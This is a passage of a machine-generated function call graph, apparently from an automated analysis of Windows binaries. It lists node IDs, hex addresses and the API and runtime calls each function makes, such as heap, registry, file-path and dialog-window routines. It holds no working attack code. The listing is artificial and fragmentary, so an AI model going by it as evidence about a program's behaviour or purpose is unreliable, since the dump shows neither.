72322 6c918c14 72320->72322 72352 6c918d3a 72320->72352 72351 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72321->72351 72322->72312 72322->72313 72325->72318 72327->72316 72331 6c91b204 _memset 72328->72331 72333 6c91b200 _memmove 72328->72333 72329 6c91b20a 72375 6c91bd29 66 API calls __getptd_noexit 72329->72375 72331->72329 72331->72333 72334 6c91b24f 72331->72334 72333->72316 72334->72333 72377 6c91bd29 66 API calls __getptd_noexit 72334->72377 72336 6c91b20f 72376 6c91ecf4 11 API calls wcstoxl 72336->72376 72338 6c918dd1 72337->72338 72339 6c918dd8 72338->72339 72378 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72338->72378 72339->72318 72353 6c918d4b 72352->72353 72354 6c918d53 72353->72354 72357 6c918d5c 72353->72357 72359 6c918c9e 72354->72359 72356 6c918d5a 72356->72322 72357->72356 72369 6c918d0b 72357->72369 72360 6c918cba 72359->72360 72368 6c92563e RtlAllocateHeap 72360->72368 72361 6c918cc5 72362 6c918cd0 72361->72362 72363 6c9177cf ctype KiUserExceptionDispatcher 72361->72363 72364 6c91b1f3 _memcpy_s 66 API calls 72362->72364 72363->72362 72365 6c918ce9 72364->72365 72366 6c918f0e ctype RtlFreeHeap 72365->72366 72367 6c918cfa 72366->72367 72367->72356 72368->72361 72370 6c918d17 72369->72370 72371 6c918d25 72369->72371 72370->72371 72374 6c9256a7 RtlReAllocateHeap 72370->72374 72372 6c9177cf ctype KiUserExceptionDispatcher 72371->72372 72373 6c918d2f 72371->72373 72372->72373 72373->72356 72374->72371 72375->72336 72376->72333 72377->72336 72381 6c918eb8 72379->72381 72380 6c8c7f06 72385 6c8f84b9 72380->72385 72381->72380 72382 6c918ee5 72381->72382 72394 6c9177cf KiUserExceptionDispatcher ctype 72381->72394 72384 6c91b1f3 _memcpy_s 66 API calls 72382->72384 72384->72380 72386 6c8f84c8 72385->72386 72391 6c8c7f1e 72385->72391 72387 6c8f84ea 72386->72387 72388 6c8f84d5 72386->72388 72389 6c918bdc ctype 101 API calls 72387->72389 72390 6c918eab ctype 67 API calls 72388->72390 72389->72391 72392 6c8f84da 72390->72392 72391->72260 72393 6c918f0e ctype RtlFreeHeap 72392->72393 72393->72391 72394->72382 72396 6c92550b 72395->72396 72397 6c9254fd RtlFreeHeap 72395->72397 72396->72263 72397->72396 72399 6c8c5c7b __EH_prolog3 72398->72399 72400 6c8c5cb4 72399->72400 72401 6c918d3a ctype 70 API calls 72399->72401 72402 6c8c5cc6 GetModuleFileNameW 72400->72402 72429 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72400->72429 72401->72400 72404 6c8f833e ctype 110 API calls 72402->72404 72405 6c8c5ce8 72404->72405 72406 6c918f0e ctype RtlFreeHeap 72405->72406 72407 6c8c5cf0 ctype 72406->72407 72407->72269 72409 6c8c5e4d __EH_prolog3 72408->72409 72410 6c8f833e ctype 110 API calls 72409->72410 72411 6c8c5e66 72410->72411 72412 6c918eab ctype 67 API calls 72411->72412 72413 6c8c5e77 PathFindFileNameW 72412->72413 72414 6c8c5e8e PathFindExtensionW 72413->72414 72416 6c8c5eab 72414->72416 72430 6c8f89f0 72416->72430 72421 6c8f84b9 ctype 101 API calls 72422 6c8c5ee2 72421->72422 72423 6c918f0e ctype RtlFreeHeap 72422->72423 72424 6c8c5eed 72423->72424 72425 6c918f0e ctype RtlFreeHeap 72424->72425 72426 6c8c5ef8 72425->72426 72427 6c918f0e ctype RtlFreeHeap 72426->72427 72428 6c8c5f03 ctype 72427->72428 72428->72273 72431 6c8f8a15 ctype 67 API calls 72430->72431 72432 6c8c5ec4 72431->72432 72433 6c8f8a15 72432->72433 72434 6c8f8a2a 72433->72434 72435 6c8f8a6d 72434->72435 72438 6c8f8a3d 72434->72438 72443 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72435->72443 72437 6c8f8a77 ctype 72444 6c8ffeb7 67 API calls 2 library calls 72437->72444 72438->72437 72439 6c8f8a5b 72438->72439 72441 6c918eab ctype 67 API calls 72439->72441 72442 6c8c5ed9 72441->72442 72442->72421 72444->72442 72445->72282 72451 6c8c4fd5 72446->72451 72449 6c8f833e ctype 110 API calls 72450 6c8c4f56 72449->72450 72450->72289 72455 6c8c4ffd 72451->72455 72452 6c91b091 __fputwc_nolock 5 API calls 72454 6c8c4eb2 72452->72454 72453 6c8c5001 72453->72452 72454->72449 72455->72453 72456 6c8c5085 GetSystemMetrics 72455->72456 72456->72453 72458 6c8c573b GetProcAddress 72457->72458 72459 6c8c5755 72457->72459 72460 6c8c574e GetSystemInfo 72458->72460 72461 6c8c574b 72458->72461 72462 6c8c5847 110 API calls 2 library calls 72459->72462 72460->72459 72461->72460 72462->72294 72464 6c8c7887 __EH_prolog3 72463->72464 72465 6c8c789e RegOpenKeyExW 72464->72465 72468 6c8c7938 ctype 72464->72468 72466 6c8c7908 SHGetFolderPathW 72465->72466 72467 6c8c78c2 RegQueryValueExW RegCloseKey 72465->72467 72470 6c8c791d 72466->72470 72471 6c8c793e 72466->72471 72467->72466 72469 6c8c78ef GetFileAttributesW 72467->72469 72468->71997 72469->72466 72472 6c8c7900 72469->72472 72486 6c91b8ad 72470->72486 72495 6c8c5d3f 72471->72495 72472->72468 72475 6c8c7930 GetFileAttributesW 72475->72468 72475->72471 72477 6c8c795e 72508 6c8f8e8b 72477->72508 72480 6c918f0e ctype RtlFreeHeap 72481 6c8c797c 72480->72481 72514 6c91b927 72481->72514 72484 6c8c7991 72485 6c918f0e ctype RtlFreeHeap 72484->72485 72485->72468 72487 6c91b8c2 72486->72487 72490 6c91b8bb 72486->72490 72523 6c91bd29 66 API calls __getptd_noexit 72487->72523 72489 6c91b8c7 72524 6c91ecf4 11 API calls wcstoxl 72489->72524 72490->72487 72493 6c91b8f7 72490->72493 72492 6c8c7929 72492->72471 72492->72475 72493->72492 72525 6c91bd29 66 API calls __getptd_noexit 72493->72525 72497 6c8c5d4b __EH_prolog3 72495->72497 72496 6c8c5d8c GetModuleFileNameW 72526 6c918afc 72496->72526 72497->72496 72498 6c918d3a ctype 70 API calls 72497->72498 72500 6c8c5d89 72498->72500 72500->72496 72502 6c8f833e ctype 110 API calls 72503 6c8c5dad 72502->72503 72531 6c8f8f73 72503->72531 72506 6c918f0e ctype RtlFreeHeap 72507 6c8c5dc0 ctype 72506->72507 72507->72477 72509 6c8f8ea9 72508->72509 72510 6c8f8eb0 PathCombineW 72508->72510 72511 6c918d3a ctype 70 API calls 72509->72511 72512 6c918afc ctype KiUserExceptionDispatcher 72510->72512 72511->72510 72513 6c8c7971 72512->72513 72513->72480 72515 6c91b935 72514->72515 72516 6c91b93c 72514->72516 72515->72516 72521 6c91b95d 72515->72521 72537 6c91bd29 66 API calls __getptd_noexit 72516->72537 72518 6c91b941 72538 6c91ecf4 11 API calls wcstoxl 72518->72538 72520 6c8c7986 GetFileAttributesW 72520->72484 72521->72520 72539 6c91bd29 66 API calls __getptd_noexit 72521->72539 72523->72489 72524->72492 72525->72489 72529 6c918b01 _wcsnlen 72526->72529 72527 6c8c5da4 72527->72502 72529->72527 72536 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72529->72536 72532 6c918d91 ctype 70 API calls 72531->72532 72533 6c8f8f83 PathRemoveFileSpecW 72532->72533 72534 6c918afc ctype KiUserExceptionDispatcher 72533->72534 72535 6c8c5db8 72534->72535 72535->72506 72537->72518 72538->72520 72539->72518 72541 6c8f9073 __EH_prolog3 72540->72541 72542 6c8f9094 72541->72542 72547 6c8f90b5 72541->72547 72557 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72541->72557 72545 6c8f90db ctype 72542->72545 72548 6c91be92 72542->72548 72543 6c918eab ctype 67 API calls 72543->72545 72545->72006 72547->72543 72547->72545 72549 6c91bea1 72548->72549 72550 6c91bebc 72548->72550 72549->72550 72551 6c91bead 72549->72551 72552 6c91bed1 72550->72552 72580 6c91e733 67 API calls wcstoxl 72550->72580 72579 6c91bd29 66 API calls __getptd_noexit 72551->72579 72558 6c920f64 72552->72558 72556 6c91beb2 _memset 72556->72547 72559 6c920f7a 72558->72559 72560 6c920f6f 72558->72560 72562 6c920f82 72559->72562 72573 6c920f8f 72559->72573 72561 6c91bfb3 _malloc 66 API calls 72560->72561 72563 6c920f77 72561->72563 72581 6c91be0e 72562->72581 72563->72556 72565 6c920fc7 72588 6c921247 _DecodePointerInternal 72565->72588 72567 6c920f97 RtlReAllocateHeap 72567->72573 72578 6c920f8a __dosmaperr 72567->72578 72568 6c920fcd 72589 6c91bd29 66 API calls __getptd_noexit 72568->72589 72570 6c920ff7 72591 6c91bd29 66 API calls __getptd_noexit 72570->72591 72573->72565 72573->72567 72573->72570 72575 6c920fdf 72573->72575 72587 6c921247 _DecodePointerInternal 72573->72587 72574 6c920ffc GetLastError 72574->72578 72590 6c91bd29 66 API calls __getptd_noexit 72575->72590 72577 6c920fe4 GetLastError 72577->72578 72578->72556 72579->72556 72580->72552 72582 6c91be42 __dosmaperr 72581->72582 72583 6c91be19 HeapFree 72581->72583 72582->72578 72583->72582 72584 6c91be2e 72583->72584 72592 6c91bd29 66 API calls __getptd_noexit 72584->72592 72586 6c91be34 GetLastError 72586->72582 72587->72573 72588->72568 72589->72578 72590->72577 72591->72574 72592->72586 72597 6c8c3c8f 72593->72597 72595 6c8c44a0 72595->72115 72596->72118 72598 6c8c3c9b __EH_prolog3 72597->72598 72599 6c8f833e ctype 110 API calls 72598->72599 72600 6c8c3cb7 72599->72600 72601 6c918e54 ctype KiUserExceptionDispatcher 72600->72601 72602 6c8c3cca 72601->72602 72603 6c8c3a16 ctype 111 API calls 72602->72603 72604 6c8c3cdd 72603->72604 72605 6c8f89f0 ctype 67 API calls 72604->72605 72639 6c8c3ded 72604->72639 72607 6c8c3cfe 72605->72607 72606 6c918f0e ctype RtlFreeHeap 72608 6c8c3e36 ctype 72606->72608 72609 6c8f84b9 ctype 101 API calls 72607->72609 72608->72595 72610 6c8c3d07 72609->72610 72611 6c918f0e ctype RtlFreeHeap 72610->72611 72612 6c8c3d16 72611->72612 72640 6c8f8989 72612->72640 72616 6c8c3d29 ctype 72617 6c918f0e ctype RtlFreeHeap 72616->72617 72618 6c8c3d48 72617->72618 72619 6c8c3d50 72618->72619 72623 6c8c3def _wcspbrk 72618->72623 72620 6c8f89f0 ctype 67 API calls 72619->72620 72621 6c8c3d5e 72620->72621 72622 6c8f84b9 ctype 101 API calls 72621->72622 72624 6c8c3d67 72622->72624 72626 6c8f8aed ctype 67 API calls 72623->72626 72623->72639 72625 6c918f0e ctype RtlFreeHeap 72624->72625 72631 6c8c3d76 ctype 72625->72631 72627 6c8c3e17 72626->72627 72628 6c8f84b9 ctype 101 API calls 72627->72628 72629 6c8c3e20 72628->72629 72630 6c918f0e ctype RtlFreeHeap 72629->72630 72630->72639 72632 6c8f8aed ctype 67 API calls 72631->72632 72631->72639 72633 6c8c3dc5 72632->72633 72634 6c8f84b9 ctype 101 API calls 72633->72634 72635 6c8c3dce 72634->72635 72636 6c918f0e ctype RtlFreeHeap 72635->72636 72637 6c8c3ddd 72636->72637 72658 6c8f8636 101 API calls 2 library calls 72637->72658 72639->72606 72659 6c8f8931 72640->72659 72642 6c8f8992 72644 6c8f89a9 72642->72644 72667 6c91c49f 72642->72667 72645 6c8c3d1d 72644->72645 72646 6c918d91 ctype 70 API calls 72644->72646 72651 6c8f8aed 72645->72651 72647 6c8f89bc 72646->72647 72670 6c917942 67 API calls 2 library calls 72647->72670 72649 6c8f89d9 72650 6c918dcd ctype 101 API calls 72649->72650 72650->72645 72652 6c8f8b02 72651->72652 72653 6c8f8b0b 72652->72653 72656 6c8f8b1a ctype 72652->72656 72654 6c918eab ctype 67 API calls 72653->72654 72655 6c8f8b13 72654->72655 72655->72616 72676 6c8ffeb7 67 API calls 2 library calls 72656->72676 72658->72639 72660 6c8f897e 72659->72660 72662 6c8f8944 72659->72662 72660->72642 72661 6c91c49f ctype GetStringTypeW 72661->72662 72662->72661 72663 6c8f8967 72662->72663 72663->72660 72664 6c918d91 ctype 70 API calls 72663->72664 72665 6c8f8975 72664->72665 72666 6c918dcd ctype 101 API calls 72665->72666 72666->72660 72671 6c92094f 72667->72671 72669 6c91c4ae 72669->72642 72670->72649 72672 6c920960 72671->72672 72673 6c920964 72671->72673 72672->72669 72674 6c92097f GetStringTypeW 72673->72674 72675 6c92096f 72673->72675 72674->72675 72675->72669 72676->72655 72678 6c918d91 ctype 70 API calls 72677->72678 72679 6c8f88e2 72678->72679 72707 6c91cb99 72679->72707 72682 6c918dcd ctype 101 API calls 72683 6c8c3a42 72682->72683 72683->72134 72685 6c8f8ce1 __EH_prolog3 ctype 72684->72685 72686 6c918e54 ctype KiUserExceptionDispatcher 72685->72686 72687 6c8f8cfa ctype 72686->72687 72769 6c8fffa8 72687->72769 72689 6c8f8d21 ctype 72689->72139 72691 6c8f8c86 __EH_prolog3 ctype 72690->72691 72692 6c918e54 ctype KiUserExceptionDispatcher 72691->72692 72693 6c8f8c9f ctype 72692->72693 72694 6c8fffa8 ctype 101 API calls 72693->72694 72695 6c8f8cc2 ctype 72694->72695 72695->72141 72697 6c8f8aab 72696->72697 72698 6c8f8ac8 ctype 72697->72698 72699 6c8f8ab6 72697->72699 72778 6c8ffeb7 67 API calls 2 library calls 72698->72778 72700 6c918eab ctype 67 API calls 72699->72700 72702 6c8c3b8c 72700->72702 72703 6c8f85bc 72702->72703 72704 6c8f85c5 72703->72704 72706 6c8c3ba1 72703->72706 72779 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72704->72779 72706->72165 72706->72166 72710 6c91cb61 72707->72710 72715 6c91c12f 72710->72715 72716 6c91c142 72715->72716 72717 6c91c18f 72715->72717 72756 6c91d3d1 66 API calls 2 library calls 72716->72756 72723 6c91c9ec 72717->72723 72719 6c91c147 72720 6c91c16f 72719->72720 72757 6c921edb 74 API calls 6 library calls 72719->72757 72720->72717 72758 6c92172d 68 API calls 6 library calls 72720->72758 72724 6c91ca08 72723->72724 72725 6c91ca1c _wcsnlen 72723->72725 72759 6c91bd29 66 API calls __getptd_noexit 72724->72759 72725->72724 72728 6c91ca33 72725->72728 72727 6c91ca0d 72760 6c91ecf4 11 API calls wcstoxl 72727->72760 72733 6c91ca17 72728->72733 72761 6c922016 LCMapStringW _wcsnlen 72728->72761 72731 6c91ca79 72734 6c91ca85 72731->72734 72735 6c91ca9c 72731->72735 72732 6c91b091 __fputwc_nolock 5 API calls 72736 6c8f88ec 72732->72736 72733->72732 72762 6c91bd29 66 API calls __getptd_noexit 72734->72762 72738 6c91caa1 72735->72738 72745 6c91cab2 72735->72745 72736->72682 72764 6c91bd29 66 API calls __getptd_noexit 72738->72764 72739 6c91ca8a 72763 6c91bd29 66 API calls __getptd_noexit 72739->72763 72741 6c91cb0a 72766 6c922016 LCMapStringW _wcsnlen 72741->72766 72742 6c91cafd 72765 6c91bd29 66 API calls __getptd_noexit 72742->72765 72746 6c91cacd __crtGetStringTypeA_stat 72745->72746 72749 6c91bfb3 _malloc 66 API calls 72745->72749 72746->72741 72746->72742 72748 6c91cb1d 72750 6c91cb35 72748->72750 72751 6c91cb24 72748->72751 72749->72746 72767 6c91bd29 66 API calls __getptd_noexit 72750->72767 72752 6c91b927 __NMSG_WRITE 66 API calls 72751->72752 72754 6c91cb2e 72752->72754 72768 6c91c244 66 API calls _free 72754->72768 72756->72719 72757->72720 72758->72717 72759->72727 72760->72733 72761->72731 72762->72739 72763->72733 72764->72727 72765->72739 72766->72748 72767->72754 72768->72733 72770 6c918d91 ctype 70 API calls 72769->72770 72771 6c8fffc2 72770->72771 72772 6c91b1f3 _memcpy_s 66 API calls 72771->72772 72773 6c8fffd3 72772->72773 72774 6c91b1f3 _memcpy_s 66 API calls 72773->72774 72775 6c8fffe3 72774->72775 72776 6c918dcd ctype 101 API calls 72775->72776 72777 6c8ffff1 72776->72777 72777->72689 72778->72702 72781 6c906583 72780->72781 72782 6c8c41bd 72780->72782 72783 6c9065a0 72781->72783 72784 6c918f0e ctype RtlFreeHeap 72781->72784 72785 6c91be0e _free 66 API calls 72783->72785 72784->72781 72785->72782 80499 6c91b059 80500 6c91b064 80499->80500 80501 6c91b069 80499->80501 80513 6c91e588 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 80500->80513 80505 6c91af5e 80501->80505 80504 6c91b077 80506 6c91af6a _flsall 80505->80506 80510 6c91b007 _flsall 80506->80510 80511 6c91afb7 ___DllMainCRTStartup 80506->80511 80514 6c91adf5 80506->80514 80508 6c91afe7 80509 6c91adf5 __CRT_INIT@12 149 API calls 80508->80509 80508->80510 80509->80510 80510->80504 80511->80508 80511->80510 80512 6c91adf5 __CRT_INIT@12 149 API calls 80511->80512 80512->80508 80513->80501 80515 6c91ae01 _flsall 80514->80515 80516 6c91ae83 80515->80516 80517 6c91ae09 80515->80517 80519 6c91aee4 80516->80519 80522 6c91ae89 80516->80522 80566 6c91e1d6 HeapCreate 80517->80566 80520 6c91aee9 80519->80520 80524 6c91af42 80519->80524 80581 6c91d21f TlsGetValue _DecodePointerInternal TlsSetValue 80520->80581 80521 6c91ae0e 80526 6c91ae19 80521->80526 80533 6c91ae12 _flsall 80521->80533 80523 6c91aea7 80522->80523 80522->80533 80576 6c91dacb 66 API calls _doexit 80522->80576 80529 6c91aebb 80523->80529 80577 6c91dd4c 67 API calls _free 80523->80577 80524->80533 80584 6c91d524 79 API calls __freefls@4 80524->80584 80567 6c91d597 86 API calls 4 library calls 80526->80567 80580 6c91aece 70 API calls __mtterm 80529->80580 80531 6c91aeee 80582 6c91d761 66 API calls __calloc_crt 80531->80582 80533->80511 80534 6c91ae1e __RTC_Initialize 80538 6c91ae22 80534->80538 80545 6c91ae2e GetCommandLineA 80534->80545 80537 6c91aefa 80537->80533 80540 6c91af06 _DecodePointerInternal 80537->80540 80568 6c91e1f9 HeapDestroy 80538->80568 80539 6c91aeb1 80578 6c91d258 70 API calls _free 80539->80578 80546 6c91af1b 80540->80546 80543 6c91ae27 80543->80533 80544 6c91aeb6 80579 6c91e1f9 HeapDestroy 80544->80579 80569 6c91e0e4 71 API calls 2 library calls 80545->80569 80549 6c91af36 80546->80549 80550 6c91af1f 80546->80550 80553 6c91be0e _free 66 API calls 80549->80553 80583 6c91d29a 66 API calls 4 library calls 80550->80583 80551 6c91ae3e 80570 6c91db02 73 API calls __calloc_crt 80551->80570 80553->80543 80555 6c91af26 GetCurrentThreadId 80555->80533 80556 6c91ae48 80557 6c91ae4c 80556->80557 80572 6c91e024 95 API calls 3 library calls 80556->80572 80571 6c91d258 70 API calls _free 80557->80571 80560 6c91ae58 80561 6c91ae6c 80560->80561 80573 6c91dda4 94 API calls 6 library calls 80560->80573 80561->80543 80575 6c91dd4c 67 API calls _free 80561->80575 80564 6c91ae61 80564->80561 80574 6c91d8cf 77 API calls 4 library calls 80564->80574 80566->80521 80567->80534 80568->80543 80569->80551 80570->80556 80571->80538 80572->80560 80573->80564 80574->80561 80575->80557 80576->80523 80577->80539 80578->80544 80579->80529 80580->80533 80581->80531 80582->80537 80583->80555 80584->80533 80585 63965dee 80586 63965e11 80585->80586 80591 63960900 80586->80591 80587 63965e7a SetWindowLongW 80588 63965e6c 80587->80588 80592 63960915 80591->80592 80593 63960937 80591->80593 80594 6396092d 80592->80594 80599 63963e60 80592->80599 80593->80587 80593->80588 80594->80593 80612 639609a0 80594->80612 80600 63963e6c __EH_prolog3 80599->80600 80622 639570f9 GetDlgItem 80600->80622 80660 63956615 CreateWindowExW SetWindowPos 80600->80660 80601 63963e73 SetWindowLongW 80661 6394ff14 EnumChildWindows 80601->80661 80604 63963eae GetParent SendMessageW 80606 63963ee4 _receive_impl 80604->80606 80607 63963ecc GetParent GetDesktopWindow 80604->80607 80606->80594 80666 6394e153 GetWindowLongW 80607->80666 80608 63963ead 80608->80604 80613 6396096e 80612->80613 80614 639609ad 80612->80614 80613->80593 80616 63965cd1 80613->80616 80614->80613 80923 63963ef9 80614->80923 80621 63965cde 80616->80621 80617 63965d7b 80617->80593 80618 63965d86 SendMessageW 80618->80617 80619 63965cea 80619->80617 80619->80618 80620 63965d66 GetDlgItem 80620->80619 80621->80617 80621->80619 80621->80620 80686 6395671f 80622->80686 80624 63957142 GetDlgItem 80729 6394edae 80624->80729 80627 6394edae 4 API calls 80628 63957172 80627->80628 80629 63957187 SetDlgItemTextW 80628->80629 80630 6395717c ShowWindow 80628->80630 80734 6394ede8 80629->80734 80630->80629 80635 6394ede8 8 API calls 80636 63957201 80635->80636 80740 63956abd GetDlgItem 80636->80740 80639 63956abd 15 API calls 80640 6395722e 80639->80640 80749 639609e0 80640->80749 80660->80601 80910 6394ffce 80661->80910 80667 6394e182 80666->80667 80668 6394e19f GetWindowRect 80666->80668 80671 6394e193 GetWindow 80667->80671 80672 6394e189 GetParent 80667->80672 80669 6394e1b4 80668->80669 80670 6394e228 GetParent GetClientRect GetClientRect MapWindowPoints 80668->80670 80674 6394e1c4 MonitorFromWindow 80669->80674 80675 6394e1b8 GetWindowLongW 80669->80675 80679 6394e20f SetWindowPos 80670->80679 80673 6394e19d 80671->80673 80672->80673 80673->80668 80677 6394e1e4 80674->80677 80678 6394e1eb GetMonitorInfoW 80674->80678 80675->80674 80682 639687c1 _wcsupr_s_l_stat 5 API calls 80677->80682 80678->80677 80680 6394e201 80678->80680 80679->80677 80680->80679 80683 6394e21b GetWindowRect 80680->80683 80684 6394e2da 80682->80684 80683->80679 80684->80606 80685 63968e26 66 API calls 2 library calls 80685->80608 80687 6395672b __EH_prolog3 80686->80687 80688 63951e75 110 API calls 80687->80688 80689 63956734 PathIsRelativeW 80688->80689 80690 6395675e 80689->80690 80701 6395674f ctype 80689->80701 80691 639683fd ctype 67 API calls 80690->80691 80692 63956768 80691->80692 80693 6395f21d 68 API calls 80692->80693 80695 6395677d 80693->80695 80694 63956928 80827 6394c9bb 67 API calls 3 library calls 80694->80827 80697 6395f21d 68 API calls 80695->80697 80699 63956787 PathFileExistsW PathFileExistsW 80697->80699 80698 63956932 80828 6394cb96 98 API calls 3 library calls 80698->80828 80699->80701 80702 6395679b 80699->80702 80701->80694 80704 639567a5 ctype 80701->80704 80822 6395ea8d 98 API calls ctype 80702->80822 80705 63967f22 5 API calls 80704->80705 80707 6395681d 80705->80707 80706 6395694a ctype 80829 6394d1b4 67 API calls 3 library calls 80706->80829 80708 639568bd 80707->80708 80710 6395e8e8 ctype 107 API calls 80707->80710 80815 63950b11 80708->80815 80713 63956833 80710->80713 80712 639568af 80826 6396dbdb RaiseException 80712->80826 80715 6395f143 98 API calls 80713->80715 80719 6395684a 80715->80719 80717 63956905 CloseHandle 80718 6395690d 80717->80718 80821 63960324 SendMessageW 80718->80821 80823 6394ca39 107 API calls 3 library calls 80719->80823 80722 63956916 80723 63956920 _receive_impl 80722->80723 80724 6395691b CloseHandle 80722->80724 80723->80624 80724->80723 80725 6395685b ctype 80824 6394cac2 98 API calls 3 library calls 80725->80824 80727 63956881 ctype 80825 6394d170 67 API calls 4 library calls 80727->80825 80834 6396547b 80729->80834 80732 6394edc1 SetWindowTextW 80733 6394edcb GetDlgItem 80732->80733 80733->80627 80735 6394ee0f 80734->80735 80736 6394ee80 80735->80736 80737 6394ee32 GetWindowPlacement MapDialogRect SetWindowPlacement 80735->80737 80840 639687c1 80736->80840 80737->80736 80739 6394ee8c SetDlgItemTextW 80739->80635 80741 6396547b 3 API calls 80740->80741 80742 63956adb 80741->80742 80743 63956ae5 ShowWindow EnableWindow 80742->80743 80744 63956af9 80742->80744 80745 63956b0e 80743->80745 80746 6394ede8 8 API calls 80744->80746 80747 63956b15 SendMessageW 80745->80747 80748 63956b24 80745->80748 80746->80745 80747->80748 80748->80639 80849 639726ce 80749->80849 80751 639609ec SendMessageW 80752 6395e8e8 ctype 107 API calls 80751->80752 80753 63960a1f 80752->80753 80754 6395e8e8 ctype 107 API calls 80753->80754 80760 63960a35 ctype 80754->80760 80755 63960e39 ctype 80850 63972722 80755->80850 80758 63960cfc 80758->80755 80761 63960d9f MapDialogRect 80758->80761 80759 63960ae2 MapDialogRect 80759->80760 80760->80758 80760->80759 80766 63960b20 ctype 80760->80766 80772 63960c20 LoadImageW 80760->80772 80777 63960c9a LoadImageW 80760->80777 80762 639691b7 77 API calls 80761->80762 80763 63960db8 80762->80763 80764 63960dbd 80763->80764 80859 63964454 80764->80859 80766->80760 80780 639683fd ctype 67 API calls 80766->80780 80853 63964782 109 API calls 80766->80853 80854 6395f8de CreateWindowExW 80766->80854 80855 6394f589 70 API calls 2 library calls 80766->80855 80857 6395f8de CreateWindowExW 80766->80857 80858 6395f933 SendMessageW 80766->80858 80770 63960b63 ShowWindow SendMessageW 80770->80766 80772->80760 80774 63960c3b 80772->80774 80856 6395f8de CreateWindowExW 80774->80856 80776 63960c64 SendMessageW 80776->80760 80777->80760 80777->80766 80780->80766 80816 63950b1a 80815->80816 80830 6394e2e1 80816->80830 80819 63950b27 SetWindowLongW 80820 63950b37 SendMessageW 80819->80820 80820->80717 80820->80718 80821->80722 80822->80704 80823->80725 80824->80727 80825->80712 80826->80708 80827->80698 80828->80706 80829->80712 80831 6394e2ef 80830->80831 80832 6394e2fb GetCurrentProcess FlushInstructionCache 80830->80832 80831->80832 80833 6394e329 80831->80833 80832->80833 80833->80819 80833->80820 80835 63965484 80834->80835 80836 6394e2e1 2 API calls 80835->80836 80837 6396548c 80836->80837 80838 63965494 SetWindowLongW 80837->80838 80839 6394edb8 80837->80839 80838->80839 80839->80732 80839->80733 80841 639687cb IsDebuggerPresent 80840->80841 80842 639687c9 80840->80842 80848 6396f0b7 80841->80848 80842->80739 80845 6396af10 SetUnhandledExceptionFilter UnhandledExceptionFilter 80846 6396af35 GetCurrentProcess TerminateProcess 80845->80846 80847 6396af2d __call_reportfault 80845->80847 80846->80739 80847->80846 80848->80845 80849->80751 80851 639687c1 _wcsupr_s_l_stat 5 API calls 80850->80851 80852 6397272c 80851->80852 80852->80852 80853->80766 80854->80770 80855->80766 80856->80776 80857->80766 80858->80766 80860 63964466 80859->80860 80871 6396528b 80860->80871 80865 63964800 80866 6396480b 80865->80866 80869 63960d1a 80865->80869 80867 63964822 80866->80867 80904 639683ce RaiseException ctype __CxxThrowException@8 80866->80904 80867->80869 80870 63968eaa __recalloc 70 API calls 80867->80870 80869->80755 80869->80758 80870->80869 80872 639652a2 80871->80872 80874 63964481 80871->80874 80873 639652b1 EnterCriticalSection 80872->80873 80872->80874 80875 639652c7 80873->80875 80876 639653da LeaveCriticalSection 80873->80876 80889 639663d4 80874->80889 80877 639652ce GetClassInfoExW 80875->80877 80878 6396533f LoadCursorW 80875->80878 80876->80874 80879 6396531e 80877->80879 80880 639652f7 GetClassInfoExW 80877->80880 80878->80879 80882 63965387 GetClassInfoExW 80879->80882 80898 63969136 97 API calls swprintf 80879->80898 80880->80879 80881 6396530c LeaveCriticalSection 80880->80881 80881->80874 80882->80876 80884 639653ae RegisterClassExW 80882->80884 80886 639653cf 80884->80886 80887 639653c1 80884->80887 80885 63965381 80885->80882 80886->80876 80899 6395e876 71 API calls 2 library calls 80887->80899 80890 6394e2e1 2 API calls 80889->80890 80891 639663e9 80890->80891 80892 639663ed SetLastError 80891->80892 80893 639663f9 80891->80893 80894 63960e00 SendMessageW ShowWindow 80892->80894 80893->80894 80900 63967dd2 80893->80900 80894->80865 80896 63966408 CreateWindowExW 80896->80894 80898->80885 80899->80886 80901 63967dd6 80900->80901 80902 63967e09 RaiseException 80900->80902 80901->80902 80903 63967dda GetCurrentThreadId EnterCriticalSection LeaveCriticalSection 80901->80903 80903->80896 80911 6394ff2d 80910->80911 80914 6394ffe9 80910->80914 80915 6395007b 80911->80915 80914->80911 80921 639683ce RaiseException ctype __CxxThrowException@8 80914->80921 80916 63950096 SetWindowPos 80915->80916 80917 6395008c 80915->80917 80916->80917 80918 6394ff32 80916->80918 80920 639500d1 SetWindowPos 80917->80920 80922 639683ce RaiseException ctype __CxxThrowException@8 80917->80922 80918->80604 80918->80685 80920->80917 80920->80918 80924 63963f1e 80923->80924 80925 63963f0b GetParent 80923->80925 80926 63963f16 80924->80926 80927 63963f45 80924->80927 80928 63963f35 80924->80928 80929 63963f51 80924->80929 80925->80924 80925->80926 80926->80613 80966 63964870 130 API calls 3 library calls 80927->80966 80935 6395757c 80928->80935 80929->80926 80932 63963f61 80929->80932 80967 6394fed9 SendMessageW 80932->80967 80934 63963f7b 80934->80926 80936 63957588 __EH_prolog3 80935->80936 80937 63957597 80936->80937 80938 6395759c 80936->80938 81006 639512ab 6 API calls ctype 80937->81006 80940 6395e8e8 ctype 107 API calls 80938->80940 80944 63957624 80938->80944 80941 639575b9 80940->80941 81007 6394c9bb 67 API calls 3 library calls 80941->81007 80943 639575ca ctype 81008 6394c9f6 67 API calls ctype 80943->81008 80945 63957679 GetParent 80944->80945 80947 6395764a GetParent SendMessageW 80944->80947 80968 6394f415 80945->80968 80953 6395775b _receive_impl 80947->80953 80953->80926 80954 639575e5 ctype 81009 6394d1b4 67 API calls 3 library calls 80954->81009 80956 639683fd ctype 67 API calls 80959 639576bc 80956->80959 80957 63957616 81010 6396dbdb RaiseException 80957->81010 80960 639683fd ctype 67 API calls 80959->80960 80961 639576e3 80960->80961 80994 6395fb4f 80961->80994 80963 639576f3 SendMessageW 80964 63957726 SetWindowLongW GetParent SetWindowTextW PostMessageW 80963->80964 80965 63957716 KiUserCallbackDispatcher 80963->80965 80964->80953 80965->80964 80966->80926 80967->80934 80969 6394f426 80968->80969 81011 6394f24c GetDlgItem 80969->81011 80971 6394f432 80972 6394f24c 5 API calls 80971->80972 80973 6394f447 